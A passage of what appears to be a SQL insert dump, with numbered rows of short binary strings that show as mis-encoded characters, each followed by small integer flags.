(2439,';n�',';n�',1,0,90,0),
(2440,'�b�','�b�',1,0,90,0),
(2441,'3O��','3O��',1,0,90,0),
(2442,'�*t�','�*t�',1,0,90,0),
(2443,'mFd','mFd',1,0,90,0),
(2444,'����','����',1,0,90,0),
(2445,'�K��','�K��',1,0,90,0),
(2446,'��e&','��e&',1,0,90,0),
(2447,'[','[',1,0,90,0),
(2448,'D��','D��',1,0,90,0),
(2449,'�_','�_',1,0,90,0),
(2450,'13��','13��',1,0,90,0),
(2451,'����','����',1,0,90,0),
(2452,'tʵ','tʵ',1,0,90,0),
(2453,'g�','g�',1,0,90,0),
(2454,'$\0�\0\0\0\0\0\0\0\0+�','$\0�\0\0\0\0\0\0\0\0+�',1,0,90,1),
(2455,'�Gm�','�Gm�',1,0,90,0),
(2456,'�H�','�H�',1,0,90,0),
(2457,'D���','D���',1,0,90,0),
(2458,'�Gȹ','�Gȹ',1,0,90,0),
(2459,'xO��','xO��',1,0,90,0),
(2460,'\rLd','\rLd',1,0,90,0),
(2461,'3�W�','3�W�',1,0,90,0),
(2462,'�c=|','�c=|',1,0,90,0),
(2463,'3���','3���',1,0,90,0),
(2464,'�cU<','�cU<',1,0,90,0),
(2465,'B*3�','B*3�',1,0,90,0),
(2466,'g���','g���',1,0,90,0),
(2467,'mFd','mFd',1,0,90,0),
(2468,'��@G','��@G',1,0,90,0),
(2469,'��|&','��|&',1,0,90,0),
(2470,'[�͋','[�͋',1,0,90,0),
(2471,'U]�','U]�',1,0,90,0),
(2472,'WvH','WvH',1,0,90,0),
(2473,'��\n�','��\n�',1,0,90,0),
(2474,'t�y�','t�y�',1,0,90,0),
(2475,'/^�s','/^�s',1,0,90,0),
(2476,'Y.Z5','Y.Z5',1,0,90,0),
(2477,'.�','.�',1,0,90,0),
(2478,'&\0<\0\0\0\0\0�<���\n','&\0<\0\0\0\0\0�<���\n',1,0,90,1),
(2479,'\\5{�','\\5{�',1,0,90,0),
(2480,'3D�','3D�',1,0,90,0),
(2481,'2t','2t',1,0,90,0),
(2482,'٠�I','٠�I',1,0,90,0),
(2483,'@*�C','@*�C',1,0,90,0),
(2484,'`/�','`/�',1,0,90,0),
(2485,'�T','�T',1,0,90,0),
(2486,'R�@*','R�@*',1,0,90,0),
(2487,'B!�&','B!�&',1,0,90,0),
(2488,'*�QX�\0\0\0\0\0\0\0','*�QX�\0\0\0\0\0\0\0',1,0,90,1),
(2489,'��I','��I',1,0,90,0),
(2490,'#�B','#�B',1,0,90,0),
(2491,'U��','U��',1,0,90,0),
(2492,'�D�','�D�',1,0,90,0),
(2493,'/l�','/l�',1,0,90,0),
(2494,'t��9','t��9',1,0,90,0),
(2495,'\\Ͳ1','\\Ͳ1',1,0,90,0),
(2496,'�;�=','�;�=',1,0,90,0),
(2497,'��sU','��sU',1,0,90,0),
(2498,'g�A�','g�A�',1,0,90,0),
(2499,'�0w�','�0w�',1,0,90,0),
(2500,'m�~','m�~',1,0,90,0),
(2501,'&\0<\0\0\0\0�<���Y@�','&\0<\0\0\0\0�<���Y@�',1,0,90,1),
(2502,'\\*o�','\\*o�',1,0,90,0),
(2503,'���','���',1,0,90,0),
(2504,'�!�','�!�',1,0,90,0),
(2505,'_�h','_�h',1,0,90,0),
(2506,'[�;9','[�;9',1,0,90,0),
(2507,'*�b?�\0\0\0\0\0\0\0','*�b?�\0\0\0\0\0\0\0',1,0,90,1),
(2508,'�8SS','�8SS',1,0,90,0),
(2509,'On0�','On0�',1,0,90,0),
(2510,'g�A�','g�A�',1,0,90,0),
(2511,'h��B','h��B',1,0,90,0),
(2512,'���','���',1,0,90,0),
(2513,'ʍ��','ʍ��',1,0,90,0),
(2514,'�:y�','�:y�',1,0,90,0),
(2515,' ��T\0��oz',' ��T\0��oz',1,0,90,1),
(2516,'C�z','C�z',1,0,90,0),
(2517,'*\0�@\0\0\0\0\0\0Im','*\0�@\0\0\0\0\0\0Im',1,0,90,1),
(2518,'g�$\"','g�$\"',1,0,90,0),
(2519,'�j^�','�j^�',1,0,90,0),
(2520,'3�@:','3�@:',1,0,90,0),
(2521,'�/=c','�/=c',1,0,90,0),
(2522,'gj��','gj��',1,0,90,0),
(2523,'Ս�u','Ս�u',1,0,90,0),
(2524,' A�\0\0\0\0\0\0\0;i',' A�\0\0\0\0\0\0\0;i',1,0,90,1),
(2525,'*�\0f\0�MO|\0\0\0','*�\0f\0�MO|\0\0\0',1,0,90,1),
(2526,'�MO|','�MO|',1,0,90,0),
(2527,'��$','��$',1,0,90,0),
(2528,'#K�','#K�',1,0,90,0),
(2529,'Q���','Q���',1,0,90,0),
(2530,'B�8_','B�8_',1,0,90,0),
(2531,'O���','O���',1,0,90,0),
(2532,'B�8j','B�8j',1,0,90,0),
(2533,'�c�','�c�',1,0,90,0),
(2534,'�!�<','�!�<',1,0,90,0),
(2535,'��p','��p',1,0,90,0),
(2536,'f��!','f��!',1,0,90,0),
(2537,'�7�','�7�',1,0,90,0),
(2538,'��','��',1,0,90,0),
(2539,'%x��','%x��',1,0,90,0),
(2540,':�7�',':�7�',1,0,90,0),
(2541,'�;�','�;�',1,0,90,0),
(2542,'.��o','.��o',1,0,90,0),
(2543,'j\0�','j\0�',1,0,90,0),
(2544,'h�Z�','h�Z�',1,0,90,0),
(2545,'�G�','�G�',1,0,90,0),
(2546,'���','���',1,0,90,0),
(2547,'mFdB','mFdB',1,0,90,0),
(2548,'���','���',1,0,90,0),
(2549,'�L�','�L�',1,0,90,0),
(2550,'w-��','w-��',1,0,90,0),
(2551,'�G,�','�G,�',1,0,90,0),
(2552,'_o�\0','_o�\0',1,0,90,0),
(2553,'�땤','�땤',1,0,90,0),
(2554,'���','���',1,0,90,0),
(2555,'>f��','>f��',1,0,90,0),
(2556,'��>?','��>?',1,0,90,0),
(2557,'�#','�#',1,0,90,0),
(2558,'mFdD','mFdD',1,0,90,0),
(2559,'4�b','4�b',1,0,90,0),
(2560,'g���','g���',1,0,90,0),
(2561,'g��','g��',1,0,90,0),
(2562,'�','�',1,0,90,0),
(2563,'N�i�','N�i�',1,0,90,0),
(2564,'k�E','k�E',1,0,90,0),
(2565,'.-�','.-�',1,0,90,0),
(2566,'#J�>','#J�>',1,0,90,0),
(2567,'��','��',1,0,90,0),
(2568,'��','��',1,0,90,0),
(2569,':/�',':/�',1,0,90,0),
(2570,'D��3','D��3',1,0,90,0),
(2571,'�_S�','�_S�',1,0,90,0),
(2572,'z�j*','z�j*',1,0,90,0),
(2573,'��o�','��o�',1,0,90,0),
(2574,'D��6','D��6',1,0,90,0),
(2575,'O�%','O�%',1,0,90,0),
(2576,'��m�','��m�',1,0,90,0),
(2577,'��8','��8',1,0,90,0),
(2578,' A�\0��\0\0\0\0\0\0\0\0',' A�\0��\0\0\0\0\0\0\0\0',1,0,90,1),
(2579,'D���','D���',1,0,90,0),
(2580,'���*','���*',1,0,90,0),
(2581,'}c��','}c��',1,0,90,0),
(2582,'�}�','�}�',1,0,90,0),
(2583,'%�J1','%�J1',1,0,90,0),
(2584,'��ug','��ug',1,0,90,0),
(2585,'H��','H��',1,0,90,0),
(2586,'H�@s','H�@s',1,0,90,0),
(2587,'�H��','�H��',1,0,90,0),
(2588,'��]�','��]�',1,0,90,0),
(2589,'��y�','��y�',1,0,90,0),
(2590,'Kw��','Kw��',1,0,90,0),
(2591,'�6rI','�6rI',1,0,90,0),
(2592,'��s�','��s�',1,0,90,0),
(2593,'�m0�','�m0�',1,0,90,0),
(2594,'�ɱ�','�ɱ�',1,0,90,0),
(2595,'C�\ne','C�\ne',1,0,90,0),
(2596,'xl�','xl�',1,0,90,0),
(2597,'�~�','�~�',1,0,90,0),
(2598,'�Z��','�Z��',1,0,90,0),
(2599,'�m�','�m�',1,0,90,0),
(2600,'�m��','�m��',1,0,90,0),
(2601,'���{','���{',1,0,90,0),
(2602,'���','���',1,0,90,0),
(2603,'�>z�','�>z�',1,0,90,0),
(2604,'\\��','\\��',1,0,90,0),
(2605,'H�}�','H�}�',1,0,90,0),
(2606,'��PW','��PW',1,0,90,0),
(2607,'&S\01\0\0\0\0\0\0\0��','&S\01\0\0\0\0\0\0\0��',1,0,90,1),
(2608,'�RN�','�RN�',1,0,90,0),
(2609,'�~Ν','�~Ν',1,0,90,0),
(2610,'��','��',1,0,90,0),
(2611,'D��f','D��f',1,0,90,0),
(2612,'aJӁ','aJӁ',1,0,90,0),
(2613,'���\Z','���\Z',1,0,90,0),
(2614,'H�~/','H�~/',1,0,90,0),
(2615,'2>��','2>��',1,0,90,0),
(2616,'s�D�','s�D�',1,0,90,0),
(2617,'D��M','D��M',1,0,90,0),
(2618,'#ժ�','#ժ�',1,0,90,0),
(2619,'����','����',1,0,90,0),
(2620,'D��C','D��C',1,0,90,0),
(2621,'3���','3���',1,0,90,0),
(2622,'&�\0`\0\0\0\0\0ϧ�','&�\0`\0\0\0\0\0ϧ�',1,0,90,1),
(2623,'���','���',1,0,90,0),
(2624,'Ո]�','Ո]�',1,0,90,0),
(2625,'2>�/','2>�/',1,0,90,0),
(2626,'�c��','�c��',1,0,90,0),
(2627,'2>��','2>��',1,0,90,0),
(2628,'�m��','�m��',1,0,90,0),
(2629,'D���','D���',1,0,90,0),
(2630,'�4� ','�4� ',1,0,90,0),
(2631,'�j*2','�j*2',1,0,90,0),
(2632,'Y(�;','Y(�;',1,0,90,0),
(2633,'&�B sCG\0\0\0\0\0\0\0','&�B sCG\0\0\0\0\0\0\0',1,0,90,1),
(2634,'�2�9','�2�9',1,0,90,0),
(2635,'D�ܰ','D�ܰ',1,0,90,0),
(2636,'D��x','D��x',1,0,90,0),
(2637,'�G�','�G�',1,0,90,0),
(2638,'H�N�','H�N�',1,0,90,0),
(2639,'�\0�','�\0�',1,0,90,0),
(2640,'����','����',1,0,90,0),
(2641,'�mD','�mD',1,0,90,0),
(2642,'�H��','�H��',1,0,90,0),
(2643,'W�Ѥ','W�Ѥ',1,0,90,0),
(2644,'Q(u','Q(u',1,0,90,0),
(2645,'�mK�','�mK�',1,0,90,0),
(2646,'/k!\Z','/k!\Z',1,0,90,0),
(2647,'H�F�','H�F�',1,0,90,0),
(2648,'��p','��p',1,0,90,0),
(2649,'D��','D��',1,0,90,0),
(2650,'D���','D���',1,0,90,0),
(2651,'��','��',1,0,90,0),
(2652,'h��!','h��!',1,0,90,0),
(2653,'2>�','2>�',1,0,90,0),
(2654,'�m�','�m�',1,0,90,0),
(2655,'����','����',1,0,90,0),
(2656,'���','���',1,0,90,0),
(2657,'�ٞ�','�ٞ�',1,0,90,0),
(2658,'�m��','�m��',1,0,90,0),
(2659,'/�k�','/�k�',1,0,90,0),
(2660,'��`�','��`�',1,0,90,0),
(2661,'\\��:','\\��:',1,0,90,0),
(2662,'k�y4','k�y4',1,0,90,0),
(2663,'D��8','D��8',1,0,90,0),
(2664,'y$�','y$�',1,0,90,0),
(2665,'H�9n','H�9n',1,0,90,0),
(2666,'�|)�','�|)�',1,0,90,0),
(2667,'��(�','��(�',1,0,90,0),
(2668,'�m�','�m�',1,0,90,0),
(2669,'\"���','\"���',1,0,90,0),
(2670,'�ɽ�','�ɽ�',1,0,90,0),
(2671,'�G�','�G�',1,0,90,0),
(2672,'\\��','\\��',1,0,90,0),
(2673,'��R%','��R%',1,0,90,0),
(2674,'2?��','2?��',1,0,90,0),
(2675,'H���','H���',1,0,90,0),
(2676,'��}�','��}�',1,0,90,0),
(2677,'�m9z','�m9z',1,0,90,0),
(2678,'2?}','2?}',1,0,90,0),
(2679,'\\�\0:','\\�\0:',1,0,90,0),
(2680,'�웉','�웉',1,0,90,0),
(2681,'��P','��P',1,0,90,0),
(2682,'��r\\','��r\\',1,0,90,0),
(2683,'H�jj','H�jj',1,0,90,0),
(2684,'t>�','t>�',1,0,90,0),
(2685,'Kw�a','Kw�a',1,0,90,0),
(2686,'j�M','j�M',1,0,90,0),
(2687,'��t�','��t�',1,0,90,0),
(2688,'%��z','%��z',1,0,90,0),
(2689,'g�(e','g�(e',1,0,90,0),
(2690,'�n�1','�n�1',1,0,90,0),
(2691,'�ɹK','�ɹK',1,0,90,0),
(2692,'�m�','�m�',1,0,90,0),
(2693,'H�e�','H�e�',1,0,90,0),
(2694,'(zN�','(zN�',1,0,90,0),
(2695,'xMT','xMT',1,0,90,0),
(2696,'��','��',1,0,90,0),
(2697,'2?� ','2?� ',1,0,90,0),
(2698,'�6}D','�6}D',1,0,90,0),
(2699,'�hQs','�hQs',1,0,90,0),
(2700,'\\�١','\\�١',1,0,90,0),
(2701,'2>��','2>��',1,0,90,0),
(2702,'m�','m�',1,0,90,0),
(2703,'\\�\nF','\\�\nF',1,0,90,0),
(2704,'\\���','\\���',1,0,90,0),
(2705,'�#��','�#��',1,0,90,0),
(2706,' A�\0-�\0\0\0\0\n@K�',' A�\0-�\0\0\0\0\n@K�',1,0,90,1),
(2707,'e��','e��',1,0,90,0),
(2708,'*�cr\0\0\0\0\0\0\0','*�cr\0\0\0\0\0\0\0',1,0,90,1),
(2709,'*� 26�\0\0\0\0\0\0\0','*� 26�\0\0\0\0\0\0\0',1,0,90,1),
(2710,'2>��','2>��',1,0,90,0),
(2711,'>���','>���',1,0,90,0),
(2712,'&�\0�6\0\0\0\0M)�','&�\0�6\0\0\0\0M)�',1,0,90,1),
(2713,'��\Z\r','��\Z\r',1,0,90,0),
(2714,'D���','D���',1,0,90,0),
(2715,'�H�n','�H�n',1,0,90,0),
(2716,'2>��','2>��',1,0,90,0),
(2717,'k�y\Z','k�y\Z',1,0,90,0),
(2718,'�B�\"','�B�\"',1,0,90,0),
(2719,'B���','B���',1,0,90,0),
(2720,'�G�O','�G�O',1,0,90,0),
(2721,'�m!','�m!',1,0,90,0),
(2722,'��s;','��s;',1,0,90,0),
(2723,'�a�s','�a�s',1,0,90,0),
(2724,'D��','D��',1,0,90,0),
(2725,'*\0ր\0 \0P\0\0\0\0\0\0ʹ','*\0ր\0 \0P\0\0\0\0\0\0ʹ',1,0,90,1),
(2726,'����','����',1,0,90,0),
(2727,'\\��K','\\��K',1,0,90,0),
(2728,'�S��','�S��',1,0,90,0),
(2729,'\\�\r�','\\�\r�',1,0,90,0),
(2730,'���^','���^',1,0,90,0),
(2731,'D���','D���',1,0,90,0),
(2732,'aJR�','aJR�',1,0,90,0),
(2733,'/�2 ','/�2 ',1,0,90,0),
(2734,'2>��','2>��',1,0,90,0),
(2735,'*�!F�\0\0\0\0\0\0\0','*�!F�\0\0\0\0\0\0\0',1,0,90,1),
(2736,'� Ӭ','� Ӭ',1,0,90,0),
(2737,'�G�+','�G�+',1,0,90,0),
(2738,'��v\"','��v\"',1,0,90,0),
(2739,'�B��','�B��',1,0,90,0),
(2740,'H�:|','H�:|',1,0,90,0),
(2741,' �\0(m>୩,v�',' �\0(m>୩,v�',1,0,90,1),
(2742,'D���','D���',1,0,90,0),
(2743,'�B�','�B�',1,0,90,0),
(2744,'\\�m','\\�m',1,0,90,0),
(2745,'DAx�','DAx�',1,0,90,0),
(2746,'/d)}','/d)}',1,0,90,0),
(2747,'�N��','�N��',1,0,90,0),
(2748,'��l','��l',1,0,90,0),
(2749,'��f�','��f�',1,0,90,0),
(2750,'& \02@\0\0\0\0\0\0\07','& \02@\0\0\0\0\0\0\07',1,0,90,1),
(2751,'&�\0�4\0\0\0\0U�','&�\0�4\0\0\0\0U�',1,0,90,1),
(2752,'&�\0/\0\0\0\0^�-','&�\0/\0\0\0\0^�-',1,0,90,1),
(2753,'D��','D��',1,0,90,0),
(2754,'+��','+��',1,0,90,0),
(2755,'�m�','�m�',1,0,90,0),
(2756,'��bm','��bm',1,0,90,0),
(2757,'�\\�j','�\\�j',1,0,90,0),
(2758,'2?��','2?��',1,0,90,0),
(2759,'��','��',1,0,90,0),
(2760,'�7v�','�7v�',1,0,90,0),
(2761,'gؼf','gؼf',1,0,90,0),
(2762,'D��[','D��[',1,0,90,0),
(2763,'Y.[W','Y.[W',1,0,90,0),
(2764,'�\\�P','�\\�P',1,0,90,0),
(2765,'��cM','��cM',1,0,90,0),
(2766,'k�D�','k�D�',1,0,90,0),
(2767,'h��','h��',1,0,90,0),
(2768,'|�S','|�S',1,0,90,0),
(2769,'gx��','gx��',1,0,90,0),
(2770,'H�,','H�,',1,0,90,0),
(2771,'���C','���C',1,0,90,0),
(2772,'�B�\Z','�B�\Z',1,0,90,0),
(2773,'M','M',1,0,90,0),
(2774,'h��','h��',1,0,90,0),
(2775,']qo�',']qo�',1,0,90,0),
(2776,'+�Y�','+�Y�',1,0,90,0),
(2777,'2?�','2?�',1,0,90,0),
(2778,'h�-','h�-',1,0,90,0),
(2779,'D���','D���',1,0,90,0),
(2780,'��t�','��t�',1,0,90,0),
(2781,'��x','��x',1,0,90,0),
(2782,'�_pO','�_pO',1,0,90,0),
(2783,'� ��','� ��',1,0,90,0),
(2784,'*@�\0\0\0\0 ��\0!�','*@�\0\0\0\0 ��\0!�',1,0,90,1),
(2785,'g���','g���',1,0,90,0),
(2786,'2>�\Z','2>�\Z',1,0,90,0),
(2787,'\\�)','\\�)',1,0,90,0),
(2788,'H�C\Z','H�C\Z',1,0,90,0),
(2789,'�mɪ','�mɪ',1,0,90,0),
(2790,'��j','��j',1,0,90,0),
(2791,'�m\"F','�m\"F',1,0,90,0),
(2792,'���5','���5',1,0,90,0),
(2793,'E��','E��',1,0,90,0),
(2794,'�Hӱ','�Hӱ',1,0,90,0),
(2795,'��=s','��=s',1,0,90,0),
(2796,'�mNT','�mNT',1,0,90,0),
(2797,'*���C\0\0\0S','*���C\0\0\0S',1,0,90,1),
(2798,'��u�','��u�',1,0,90,0),
(2799,'2?\0','2?\0',1,0,90,0),
(2800,'�;o','�;o',1,0,90,0),
(2801,'��s�','��s�',1,0,90,0),
(2802,'��b^','��b^',1,0,90,0),
(2803,'\\��','\\��',1,0,90,0),
(2804,'D��','D��',1,0,90,0),
(2805,'2>�2','2>�2',1,0,90,0),
(2806,'��V','��V',1,0,90,0),
(2807,'$\0�\0\0\0\0�<����\r�','$\0�\0\0\0\0�<����\r�',1,0,90,1),
(2808,'/jɆ','/jɆ',1,0,90,0),
(2809,'\"@�f','\"@�f',1,0,90,0),
(2810,'U�U�','U�U�',1,0,90,0),
(2811,'+��','+��',1,0,90,0),
(2812,'D���','D���',1,0,90,0),
(2813,'��s�','��s�',1,0,90,0),
(2814,'g(\'','g(\'',1,0,90,0),
(2815,'�m�|','�m�|',1,0,90,0),
(2816,'/kG�','/kG�',1,0,90,0),
(2817,'/n�J','/n�J',1,0,90,0),
(2818,'���','���',1,0,90,0),
(2819,'$\0a�\0\0�\0\0\0\0�0','$\0a�\0\0�\0\0\0\0�0',1,0,90,1),
(2820,'�ɺ�','�ɺ�',1,0,90,0),
(2821,'@Z0�','@Z0�',1,0,90,0),
(2822,' A�\0\0\0\0\0\0\0f|',' A�\0\0\0\0\0\0\0f|',1,0,90,1),
(2823,'H��:','H��:',1,0,90,0),
(2824,'\\��','\\��',1,0,90,0),
(2825,'D���','D���',1,0,90,0),
(2826,'��y','��y',1,0,90,0),
(2827,'D��','D��',1,0,90,0),
(2828,'KgB','KgB',1,0,90,0),
(2829,'aJ[Z','aJ[Z',1,0,90,0),
(2830,'���','���',1,0,90,0),
(2831,'g��','g��',1,0,90,0),
(2832,'�Yh�','�Yh�',1,0,90,0),
(2833,'@*�+','@*�+',1,0,90,0),
(2834,'|(��','|(��',1,0,90,0),
(2835,'�3�','�3�',1,0,90,0),
(2836,'H��','H��',1,0,90,0),
(2837,'���c','���c',1,0,90,0),
(2838,'��','��',1,0,90,0),
(2839,'�mE�','�mE�',1,0,90,0),
(2840,'���.','���.',1,0,90,0),
(2841,'$_�0\0\0\0\0\0\0\0\0\0\r','$_�0\0\0\0\0\0\0\0\0\0\r',1,0,90,1),
(2842,'(D\0\0\0\0\0\0\0\0\0\05','(D\0\0\0\0\0\0\0\0\0\05',1,0,90,1),
(2843,'�G�8','�G�8',1,0,90,0),
(2844,'��t�','��t�',1,0,90,0),
(2845,'xN��','xN��',1,0,90,0),
(2846,'u���','u���',1,0,90,0),
(2847,'�B�\Z','�B�\Z',1,0,90,0),
(2848,'��r�','��r�',1,0,90,0),
(2849,'M[F�','M[F�',1,0,90,0),
(2850,'D���','D���',1,0,90,0),
(2851,'D��','D��',1,0,90,0),
(2852,'�2�','�2�',1,0,90,0),
(2853,'t>1`','t>1`',1,0,90,0),
(2854,'&�\0�D\0\0\0\0<k','&�\0�D\0\0\0\0<k',1,0,90,1),
(2855,'�:�','�:�',1,0,90,0),
(2856,'�2�w','�2�w',1,0,90,0),
(2857,'�ɽ<','�ɽ<',1,0,90,0),
(2858,'D��W','D��W',1,0,90,0),
(2859,'&�\0�V\0\0\0\0\n&��','&�\0�V\0\0\0\0\n&��',1,0,90,1),
(2860,'@Z\"f','@Z\"f',1,0,90,0),
(2861,'&�\0�D\0\0\0\0 ]��','&�\0�D\0\0\0\0 ]��',1,0,90,1),
(2862,'�GH�','�GH�',1,0,90,0),
(2863,'/s2�','/s2�',1,0,90,0),
(2864,'�G�&','�G�&',1,0,90,0),
(2865,'@Z0�','@Z0�',1,0,90,0),
(2866,'�2�o','�2�o',1,0,90,0),
(2867,'D���','D���',1,0,90,0),
(2868,'g�[;','g�[;',1,0,90,0),
(2869,'D��','D��',1,0,90,0),
(2870,'aJҍ','aJҍ',1,0,90,0),
(2871,'�m,','�m,',1,0,90,0),
(2872,'D���','D���',1,0,90,0),
(2873,'r7�o','r7�o',1,0,90,0),
(2874,'g���','g���',1,0,90,0),
(2875,'��u�','��u�',1,0,90,0),
(2876,'Rfk','Rfk',1,0,90,0),
(2877,'p���','p���',1,0,90,0),
(2878,'�F','�F',1,0,90,0),
(2879,'�IT\"','�IT\"',1,0,90,0),
(2880,'D��)','D��)',1,0,90,0),
(2881,'��t~','��t~',1,0,90,0),
(2882,'*��\0\0�\0\0\0\0�','*��\0\0�\0\0\0\0�',1,0,90,1),
(2883,'�ɴ�','�ɴ�',1,0,90,0),
(2884,'�x��','�x��',1,0,90,0),
(2885,'�N','�N',1,0,90,0),
(2886,'D�4$','D�4$',1,0,90,0),
(2887,'�Hz�','�Hz�',1,0,90,0),
(2888,'�찃','�찃',1,0,90,0),
(2889,'&�\0\0\0\0\0\0#\"�','&�\0\0\0\0\0\0#\"�',1,0,90,1),
(2890,'�B�','�B�',1,0,90,0),
(2891,'�ٴ(','�ٴ(',1,0,90,0),
(2892,'�G�G','�G�G',1,0,90,0),
(2893,'�*\Z�','�*\Z�',1,0,90,0),
(2894,'�E|T','�E|T',1,0,90,0),
(2895,'����','����',1,0,90,0),
(2896,'�ɼ�','�ɼ�',1,0,90,0),
(2897,'D��N','D��N',1,0,90,0),
(2898,'�}�0','�}�0',1,0,90,0),
(2899,'D��','D��',1,0,90,0),
(2900,'*� fhe\0\0\0\0\0\0\0','*� fhe\0\0\0\0\0\0\0',1,0,90,1),
(2901,'#��','#��',1,0,90,0),
(2902,'�[�','�[�',1,0,90,0),
(2903,'�ɿ','�ɿ',1,0,90,0),
(2904,'k�T�','k�T�',1,0,90,0),
(2905,'��*','��*',1,0,90,0),
(2906,'�*t�','�*t�',1,0,90,0),
(2907,'��<','��<',1,0,90,0),
(2908,'B�H','B�H',1,0,90,0),
(2909,'���','���',1,0,90,0),
(2910,'B�2','B�2',1,0,90,0),
(2911,'�@t','�@t',1,0,90,0),
(2912,'��','��',1,0,90,0),
(2913,'��}(','��}(',1,0,90,0),
(2914,'�2� ','�2� ',1,0,90,0),
(2915,'���','���',1,0,90,0),
(2916,'�@w�','�@w�',1,0,90,0),
(2917,'�@t2','�@t2',1,0,90,0),
(2918,'���A','���A',1,0,90,0),
(2919,'�@v�','�@v�',1,0,90,0),
(2920,'�Ǐ�','�Ǐ�',1,0,90,0),
(2921,'>f��','>f��',1,0,90,0),
(2922,'@Z8�','@Z8�',1,0,90,0),
(2923,'�h�+','�h�+',1,0,90,0),
(2924,'E�DŽ','E�DŽ',1,0,90,0),
(2925,'���','���',1,0,90,0),
(2926,'MD�','MD�',1,0,90,0),
(2927,'�,MG','�,MG',1,0,90,0),
(2928,'��','��',1,0,90,0),
(2929,'����','����',1,0,90,0),
(2930,'��','��',1,0,90,0),
(2931,'���3','���3',1,0,90,0),
(2932,'*�r3F\0\0\0\0\0\0\0','*�r3F\0\0\0\0\0\0\0',1,0,90,1),
(2933,'���','���',1,0,90,0),
(2934,'»��','»��',1,0,90,0),
(2935,'w*�z','w*�z',1,0,90,0),
(2936,'D�0l','D�0l',1,0,90,0),
(2937,'%x��','%x��',1,0,90,0),
(2938,'T*�','T*�',1,0,90,0),
(2939,'��t�','��t�',1,0,90,0),
(2940,'&\0\0_h2���$��)�','&\0\0_h2���$��)�',1,0,90,1),
(2941,'���!','���!',1,0,90,0),
(2942,'#�','#�',1,0,90,0),
(2943,'[�f','[�f',1,0,90,0),
(2944,'��zj','��zj',1,0,90,0),
(2945,'��KN','��KN',1,0,90,0),
(2946,'�K��','�K��',1,0,90,0),
(2947,'�K��','�K��',1,0,90,0),
(2948,'�>UK','�>UK',1,0,90,0),
(2949,'@*�3','@*�3',1,0,90,0),
(2950,'�V[g','�V[g',1,0,90,0),
(2951,'��÷','��÷',1,0,90,0),
(2952,'m���','m���',1,0,90,0),
(2953,'�F=�','�F=�',1,0,90,0),
(2954,'�Fs�','�Fs�',1,0,90,0),
(2955,'C�-l','C�-l',1,0,90,0),
(2956,'ٗb�','ٗb�',1,0,90,0),
(2957,'#���','#���',1,0,90,0),
(2958,'��GG','��GG',1,0,90,0),
(2959,'X��','X��',1,0,90,0),
(2960,'Q��','Q��',1,0,90,0),
(2961,'��t�','��t�',1,0,90,0),
(2962,'ْSl','ْSl',1,0,90,0),
(2963,'�%�','�%�',1,0,90,0),
(2964,'�P�','�P�',1,0,90,0),
(2965,'S��','S��',1,0,90,0),
(2966,'��\n�','��\n�',1,0,90,0),
(2967,'�%�','�%�',1,0,90,0),
(2968,'��\n�','��\n�',1,0,90,0),
(2969,'٠?�','٠?�',1,0,90,0),
(2970,'�\"��','�\"��',1,0,90,0),
(2971,'�\"��','�\"��',1,0,90,0),
(2972,'���','���',1,0,90,0),
(2973,'%.zf','%.zf',1,0,90,0),
(2974,'���','���',1,0,90,0),
(2975,'��','��',1,0,90,0),
(2976,'�۰','�۰',1,0,90,0),
(2977,'�3A*','�3A*',1,0,90,0),
(2978,'h�Z�','h�Z�',1,0,90,0),
(2979,'��n�','��n�',1,0,90,0),
(2980,'\\�lp','\\�lp',1,0,90,0),
(2981,'�E','�E',1,0,90,0),
(2982,'�O','�O',1,0,90,0),
(2983,'\\�i�','\\�i�',1,0,90,0),
(2984,'\\�U�','\\�U�',1,0,90,0),
(2985,'���','���',1,0,90,0),
(2986,'MD\"','MD\"',1,0,90,0),
(2987,'(F,','(F,',1,0,90,0),
(2988,'J��','J��',1,0,90,0),
(2989,'����','����',1,0,90,0),
(2990,'��j!','��j!',1,0,90,0),
(2991,'�]��','�]��',1,0,90,0),
(2992,'ٗb�','ٗb�',1,0,90,0),
(2993,'À��','À��',1,0,90,0),
(2994,'��f','��f',1,0,90,0),
(2995,'Rf�','Rf�',1,0,90,0),
(2996,'R��E','R��E',1,0,90,0),
(2997,'�K��','�K��',1,0,90,0),
(2998,'-�\"E','-�\"E',1,0,90,0),
(2999,'�bf�','�bf�',1,0,90,0),
(3000,'���;','���;',1,0,90,0),
(3001,'��J8','��J8',1,0,90,0),
(3002,'�߂','�߂',1,0,90,0),
(3003,'�hP','�hP',1,0,90,0),
(3004,'3DOD','3DOD',1,0,90,0),
(3005,'�-�','�-�',1,0,90,0),
(3006,'Jе_','Jе_',1,0,90,0),
(3007,'R�5\Z','R�5\Z',1,0,90,0),
(3008,'*�\0f\0\\3��\0\0\0','*�\0f\0\\3��\0\0\0',1,0,90,1),
(3009,'4��','4��',1,0,90,0),
(3010,'k��','k��',1,0,90,0),
(3011,'\"�4\n','\"�4\n',1,0,90,0),
(3012,'��!�','��!�',1,0,90,0),
(3013,'�\"�','�\"�',1,0,90,0),
(3014,'[���','[���',1,0,90,0),
(3015,'��n','��n',1,0,90,0),
(3016,'3D�','3D�',1,0,90,0),
(3017,'4��`','4��`',1,0,90,0),
(3018,'#��','#��',1,0,90,0),
(3019,'\rY�','\rY�',1,0,90,0),
(3020,'4���','4���',1,0,90,0),
(3021,'���','���',1,0,90,0),
(3022,'��R�','��R�',1,0,90,0),
(3023,'��K<','��K<',1,0,90,0),
(3024,'��I','��I',1,0,90,0),
(3025,'�Ƿ(','�Ƿ(',1,0,90,0),
(3026,'4��}','4��}',1,0,90,0),
(3027,'��>','��>',1,0,90,0),
(3028,'(z�I','(z�I',1,0,90,0),
(3029,'�Ƿ8','�Ƿ8',1,0,90,0),
(3030,'(z��','(z��',1,0,90,0),
(3031,'��X','��X',1,0,90,0),
(3032,'��F�','��F�',1,0,90,0),
(3033,'���N','���N',1,0,90,0),
(3034,'�Fe/','�Fe/',1,0,90,0),
(3035,'(E��','(E��',1,0,90,0),
(3036,'(z�l','(z�l',1,0,90,0),
(3037,'ʬ\n','ʬ\n',1,0,90,0),
(3038,' K���\0\0\0\0\0\0\0',' K���\0\0\0\0\0\0\0',1,0,90,1),
(3039,'\\��','\\��',1,0,90,0),
(3040,'(zӳ','(zӳ',1,0,90,0),
(3041,'MDw�','MDw�',1,0,90,0),
(3042,'���','���',1,0,90,0),
(3043,'��]S','��]S',1,0,90,0),
(3044,'U�}�','U�}�',1,0,90,0),
(3045,')ؼ�',')ؼ�',1,0,90,0),
(3046,'\rY\n','\rY\n',1,0,90,0),
(3047,'\rY�','\rY�',1,0,90,0),
(3048,'4���','4���',1,0,90,0),
(3049,'g<','g<',1,0,90,0),
(3050,'�%','�%',1,0,90,0),
